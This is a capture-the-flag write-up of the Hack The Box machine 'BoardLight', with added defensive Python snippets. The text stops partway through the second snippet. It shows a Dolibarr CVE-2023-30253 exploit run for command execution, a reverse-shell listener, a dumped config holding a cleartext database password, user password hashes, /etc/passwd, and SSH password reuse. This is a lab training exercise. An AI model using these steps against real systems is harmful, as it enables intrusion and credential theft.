Introduction
This article is a write-up of my attempt at the Hack The Box machine "BoardLight" (see the link below).
Note: as with previous posts, this does not go into detail on how each tool is used.
Note: please do not misuse this. Use these techniques only to contribute to society, since otherwise you would be breaking the law.
Initial Enumeration
Port Scan
┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.129.162.57 --top
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.162.57:22
Open 10.129.162.57:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 07:52 EDT
Initiating Ping Scan at 07:52
Scanning 10.129.162.57 [4 ports]
Completed Ping Scan at 07:52, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:52
Completed Parallel DNS resolution of 1 host. at 07:52, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:52
Scanning 10.129.162.57 [2 ports]
Discovered open port 22/tcp on 10.129.162.57
Discovered open port 80/tcp on 10.129.162.57
Completed SYN Stealth Scan at 07:52, 0.33s elapsed (2 total ports)
Nmap scan report for 10.129.162.57
Host is up, received reset ttl 63 (0.29s latency).
Scanned at 2024-05-27 07:52:36 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
Ports 22 and 80 are exposed.
Accessing port 80 shows the following site.
Site Enumeration
whatweb
First, let's just run it.
┌──(root㉿kali)-[~/work]
└─# whatweb -v http://10.129.162.57/
WhatWeb report for http://10.129.162.57/
Status : 200 OK
Title : <None>
IP : 10.129.162.57
Country : RESERVED, ZZ
Summary : Apache[2.4.41], Bootstrap, Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : info@board.htb
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.4.1
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 27 May 2024 11:58:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2991
Connection: close
Content-Type: text/html; charset=UTF-8
An e-mail address is visible, so I register the following in /etc/hosts.
10.129.162.57 board.htb
Subdomain Enumeration
I enumerate using ffuf.
┌──(root㉿kali)-[~/work]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://board.htb/ -H "Host: FUZZ.board.htb" -mc all -fs 15949 -t 150
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: all
:: Filter : Response size: 15949
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 1390ms]
* [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 422ms]
:: Progress: [100000/100000] :: Job [1/1] :: 465 req/sec :: Duration: [0:04:56] :: Errors: 0 ::
Found one, so I add it to /etc/hosts as well.
10.129.162.57 board.htb crm.board.htb
In cases like this, the vulnerabilities and useful information are usually on the subdomain side, so let's explore that.
Directory Enumeration
┌──(root㉿kali)-[~/work]
└─# dirsearch -u http://crm.board.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/work/reports/http_crm.board.htb/__24-05-27_08-02-04.txt
Target: http://crm.board.htb/
[08:02:04] Starting:
[08:02:15] 403 - 278B - /.ht_wsr.txt
[08:02:15] 403 - 278B - /.htaccess.bak1
[08:02:15] 403 - 278B - /.htaccess.sample
[08:02:15] 403 - 278B - /.htaccess.orig
[08:02:15] 403 - 278B - /.htaccess.save
[08:02:15] 403 - 278B - /.htaccess_sc
[08:02:15] 403 - 278B - /.htaccess_extra
[08:02:15] 403 - 278B - /.htaccess_orig
[08:02:15] 403 - 278B - /.htaccessBAK
[08:02:15] 403 - 278B - /.htaccessOLD
[08:02:15] 403 - 278B - /.htaccessOLD2
[08:02:15] 403 - 278B - /.htm
[08:02:15] 403 - 278B - /.html
[08:02:15] 403 - 278B - /.htpasswd_test
[08:02:15] 403 - 278B - /.htpasswds
[08:02:15] 403 - 278B - /.httr-oauth
[08:02:19] 403 - 278B - /.php
[08:02:34] 301 - 314B - /admin -> http://crm.board.htb/admin/
[08:02:52] 301 - 312B - /api -> http://crm.board.htb/api/
[08:02:53] 200 - 108B - /api/
[08:02:55] 403 - 278B - /asterisk/
[08:03:06] 301 - 319B - /categories -> http://crm.board.htb/categories/
[08:03:10] 404 - 16B - /composer.phar
[08:03:10] 403 - 278B - /conf
[08:03:10] 403 - 278B - /conf/
[08:03:10] 403 - 278B - /conf/Catalina
[08:03:10] 403 - 278B - /conf/catalina.policy
[08:03:10] 403 - 278B - /conf/catalina.properties
[08:03:10] 403 - 278B - /conf/context.xml
[08:03:10] 403 - 278B - /conf/logging.properties
[08:03:10] 403 - 278B - /conf/server.xml
[08:03:10] 403 - 278B - /conf/web.xml
[08:03:10] 403 - 278B - /conf/tomcat-users.xml
[08:03:10] 403 - 278B - /conf/tomcat8.conf
[08:03:12] 301 - 316B - /contact -> http://crm.board.htb/contact/
[08:03:13] 301 - 313B - /core -> http://crm.board.htb/core/
[08:03:14] 301 - 313B - /cron -> http://crm.board.htb/cron/
[08:03:14] 403 - 278B - /cron/
[08:03:14] 403 - 278B - /custom/
[08:03:23] 200 - 2KB - /favicon.ico
[08:03:25] 301 - 312B - /ftp -> http://crm.board.htb/ftp/
[08:03:31] 301 - 317B - /includes -> http://crm.board.htb/includes/
[08:03:31] 403 - 278B - /includes/
[08:03:32] 301 - 316B - /install -> http://crm.board.htb/install/
[08:03:32] 200 - 322B - /install/
[08:03:32] 200 - 322B - /install/index.php?upgrade/
[08:03:52] 404 - 16B - /php-cs-fixer.phar
[08:03:53] 403 - 278B - /php5.fcgi
[08:03:56] 404 - 16B - /phpunit.phar
[08:03:59] 301 - 316B - /product -> http://crm.board.htb/product/
[08:03:59] 301 - 315B - /public -> http://crm.board.htb/public/
[08:04:00] 302 - 0B - /public/ -> /public/error-404.php
[08:04:02] 301 - 317B - /resource -> http://crm.board.htb/resource/
[08:04:03] 200 - 105B - /robots.txt
[08:04:05] 200 - 176B - /security.txt
[08:04:05] 403 - 278B - /server-status/
[08:04:05] 403 - 278B - /server-status
[08:04:12] 301 - 316B - /support -> http://crm.board.htb/support/
[08:04:13] 200 - 1KB - /support/
[08:04:16] 301 - 314B - /theme -> http://crm.board.htb/theme/
[08:04:20] 301 - 313B - /user -> http://crm.board.htb/user/
[08:04:20] 403 - 278B - /user/
[08:04:20] 301 - 319B - /user/admin -> http://crm.board.htb/user/admin/
[08:04:26] 301 - 316B - /website -> http://crm.board.htb/website/
Task Completed
Quite a lot is visible.
Browsing
Let's access the subdomain.
Dolibarr 17.0.0 is visible. Perhaps a vulnerability in this software?
First, I try logging in with admin:admin.
It worked.
Initial Access
CVE-2023-30253
Searching for vulnerability information on this version, the following repository comes up.
Set up the environment for this exploit code.
┌──(root㉿kali)-[~/work]
└─# git clone https://github.com/Rubikcuv5/cve-2023-30253.git
┌──(root㉿kali)-[~/work]
└─# cd cve-2023-30253
┌──(root㉿kali)-[~/work/cve-2023-30253]
└─# python -m venv venv
┌──(root㉿kali)-[~/work/cve-2023-30253]
└─# source ./venv/bin/activate
┌──(venv)─(root㉿kali)-[~/work/cve-2023-30253]
└─# pip install -r requirements.txt
Following these steps should get the environment ready.
Let's actually try the command.
┌──(venv)─(root㉿kali)-[~/work/cve-2023-30253]
└─# python CVE-2023-30253.py --url http://crm.board.htb/ -u admin -p admin -c whoami
[+] By Rubikcuv5.
[*] Url: http://crm.board.htb/
[*] User: admin
[*] Password: admin
[*] Command: whoami
[*] Verifying accessibility of URL:http://crm.board.htb//admin/index.php
[*] Attempting login to http://crm.board.htb//admin/index.php as admin
[+] Login successfully!
[*] Creating web site ...
[+] Web site was create successfully!
[*] Creating web page ...
[+] Web page was create successfully!
[*] Executing command whoami
[+] Command execution successful :
www-data
[+] Information retrieved successfully!
RCE worked.
Revshell
I use the usual site for this.
Interactive shell
Stabilize the shell so that tab completion and the like work.
┌──(root㉿kali)-[~/work]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.162.57] 57028
whoami
www-data
python3 -c 'import pty; pty.spawn("bash")'
www-data@boardlight:~/html/crm.board.htb/htdocs/website$
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ ^Z
zsh: suspended nc -lvnp 4444
┌──(root㉿kali)-[~/work]
└─# stty raw -echo; fg
[1] + continued nc -lvnp 4444
export TERM=xterm
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ export SHELL=/bin/bash
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ reset
Credential Access
This account cannot get the user flag, so let's enumerate for information.
There was a conf directory, so I went looking for things like a .env file.
I found the following file, conf.php, so let's look at it.
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';
//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
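As an added, defender-side example (not code from the write-up or from Dolibarr): a small Python audit of the settings this conf.php exposes. The regex, the check thresholds and SAMPLE_CONF (built from the dump above with a placeholder password) are my own assumptions.

```python
"""Audit a Dolibarr conf.php for settings that weaken the install.

Added example for this write-up, not Dolibarr's own code. The checks
cover the settings visible in the conf.php dumped above; SAMPLE_CONF is
constructed from that dump with a placeholder password.
"""
import re

# Matches a live assignment such as  $dolibarr_main_prod='0';
# (single or double quotes, optional whitespace around '=').
_ASSIGN = re.compile(r"""^\s*\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.MULTILINE)

SAMPLE_CONF = """<?php
// File generated by Dolibarr installer 17.0.0 (constructed sample)
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='<PLACEHOLDER_DB_PASSWORD>';
$dolibarr_main_authentication='dolibarr';
//$dolibarr_main_demo='autologin,autopass';
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_distrib='standard';
"""


def parse_conf(text):
    """Return the live $dolibarr_* assignments as a dict.

    Lines starting with // are dropped first, so a commented-out setting
    such as //$dolibarr_main_demo is not reported as active.
    """
    live = "\n".join(
        line for line in text.splitlines() if not line.lstrip().startswith("//")
    )
    return {name: value for name, _quote, value in _ASSIGN.findall(live)}


def audit_conf(conf):
    """Return a list of (severity, setting, message) findings."""
    findings = []
    if conf.get("dolibarr_main_prod") != "1":
        findings.append(("medium", "dolibarr_main_prod",
                         "not in production mode; detailed errors are shown to users"))
    if conf.get("dolibarr_main_force_https") != "1":
        findings.append(("medium", "dolibarr_main_force_https",
                         "HTTPS is not enforced; logins can travel in clear text"))
    if conf.get("dolibarr_nocsrfcheck", "0") != "0":
        findings.append(("high", "dolibarr_nocsrfcheck", "CSRF check is disabled"))
    if conf.get("dolibarr_main_demo"):
        findings.append(("high", "dolibarr_main_demo", "demo autologin is enabled"))
    if conf.get("dolibarr_main_db_pass"):
        # The web server user must be able to read this file, so any
        # web-app compromise yields the DB password: it must be unique
        # to the database and never reused for OS or SSH accounts.
        findings.append(("info", "dolibarr_main_db_pass",
                         "DB password stored in clear text; do not reuse it elsewhere"))
    return findings


if __name__ == "__main__":
    for severity, setting, message in audit_conf(parse_conf(SAMPLE_CONF)):
        print(f"[{severity}] {setting}: {message}")
```

Point it at the real file with `parse_conf(open(path).read())`; on this box the password reuse it warns about is exactly what gives up the user account later.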
These are MySQL credentials, so let's try using them.
First, check whether the mysql client exists on the machine.
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql --version
mysql Ver 8.0.36-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))
It does, so let's explore the DB with it.
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql -h 127.0.0.1 -u dolibarrowner -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 237
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| dolibarr |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)
mysql> use dolibarr;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Checking with show tables; reveals an llx_user table, so let's inspect its contents.
mysql> select * from llx_user;
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+--------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| rowid | entity | ref_employee | ref_ext | admin | employee | fk_establishment | datec | tms | fk_user_creat | fk_user_modif | login | pass_encoding | pass | pass_crypted | pass_temp | api_key | gender | civility | lastname | firstname | address | zip | town | fk_state | fk_country | birth | birth_place | job | office_phone | office_fax | user_mobile | personal_mobile | email | personal_email | signature | socialnetworks | fk_soc | fk_socpeople | fk_member | fk_user | fk_user_expense_validator | fk_user_holiday_validator | idpers1 | idpers2 | idpers3 | note_public | note_private | model_pdf | datelastlogin | datepreviouslogin | datelastpassvalidation | datestartvalidity | dateendvalidity | iplastlogin | ippreviouslogin | egroupware_id | ldap_sid | openid | statut | photo | lang | color | barcode | fk_barcode_type | accountancy_code | nb_holiday | thm | tjm | salary | salaryextra | dateemployment | dateemploymentend | weeklyhours | import_key | default_range | default_c_exp_tax_cat | national_registration_number | fk_warehouse |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+--------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| 1 | 0 | | NULL | 1 | 1 | 0 | 2024-05-13 13:21:56 | 2024-05-13 13:21:56 | NULL | NULL | dolibarr | NULL | NULL | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL | NULL | | | SuperAdmin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | null | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-15 09:57:04 | 2024-05-13 23:23:59 | NULL | NULL | NULL | 10.10.14.31 | 10.10.14.41 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
| 2 | 1 | | NULL | 0 | 1 | 0 | 2024-05-13 13:24:01 | 2024-05-15 09:58:40 | NULL | NULL | admin | NULL | NULL | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | NULL | yr6V3pXd9QEI | NULL | | admin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | [] | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-27 05:17:38 | 2024-05-27 05:17:14 | NULL | NULL | NULL | 10.10.14.102 | 10.10.14.102 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+--------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
2 rows in set (0.00 sec)
This gives us the password hashes, but John could not crack them.
On the simple guess that the MySQL password is reused as a user's password, let's check the users on the system.
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:126:131:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:127:134:MySQL Server,,,:/nonexistent:/bin/false
fwupd-refresh:x:128:135:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
sshd:x:129:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
larissa appears to have a home directory, so I try SSH with those credentials.
It worked! That gets us the user flag.
Privilege Escalation
Enumeration
linpeas
Run the familiar PEAS.
larissa@boardlight:/tmp$ ./linpeas.sh
linpeas-ng by github.com/PEASS-ng
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...(omitted)
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
-rwsr-xr-- 1 root messagebus 51K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 467K Jan 2 09:13 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 44K Feb 6 04:49 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 55K Apr 9 08:34 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 163K Apr 4 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 67K Apr 9 08:34 /usr/bin/su
-rwsr-xr-x 1 root root 84K Feb 6 04:49 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 39K Apr 9 08:34 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K Feb 6 04:49 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K Feb 6 04:49 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 52K Feb 6 04:49 /usr/bin/chsh
-rwsr-xr-x 1 root root 15K Oct 27 2023 /usr/bin/vmware-user-suid-wrapper
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwxr-sr-x 1 root mail 23K Apr 7 2021 /usr/libexec/camel-lock-helper-1.2
-rwxr-sr-x 1 root shadow 43K Jan 10 05:55 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Jan 10 05:55 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root mail 15K Aug 26 2019 /usr/bin/mlock
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Feb 6 04:49 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 83K Feb 6 04:49 /usr/bin/chage
-rwxr-sr-x 1 root ssh 343K Jan 2 09:13 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
...(omitted)
There are some enlightenment-related SUID binaries here.
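As an added, defender-side example (not from linpeas or the box): a Python check that diffs `ls -l`-style SUID listings like the one above against a baseline of expected setuid binaries, so non-stock entries such as enlightenment_sys stand out in a review. BASELINE is an illustrative allow-list and SAMPLE_LINES is constructed from the linpeas output above; both are my assumptions.

```python
"""Flag root-owned setuid binaries that are not on a known baseline.

Added example for this write-up, not part of linpeas or the box. Input
is the `ls -l`-style lines linpeas prints; BASELINE is an illustrative
allow-list (build a real one from a clean image of the same release).
"""

# Assumed stock setuid binaries for this example, taken from the listing.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/mount",
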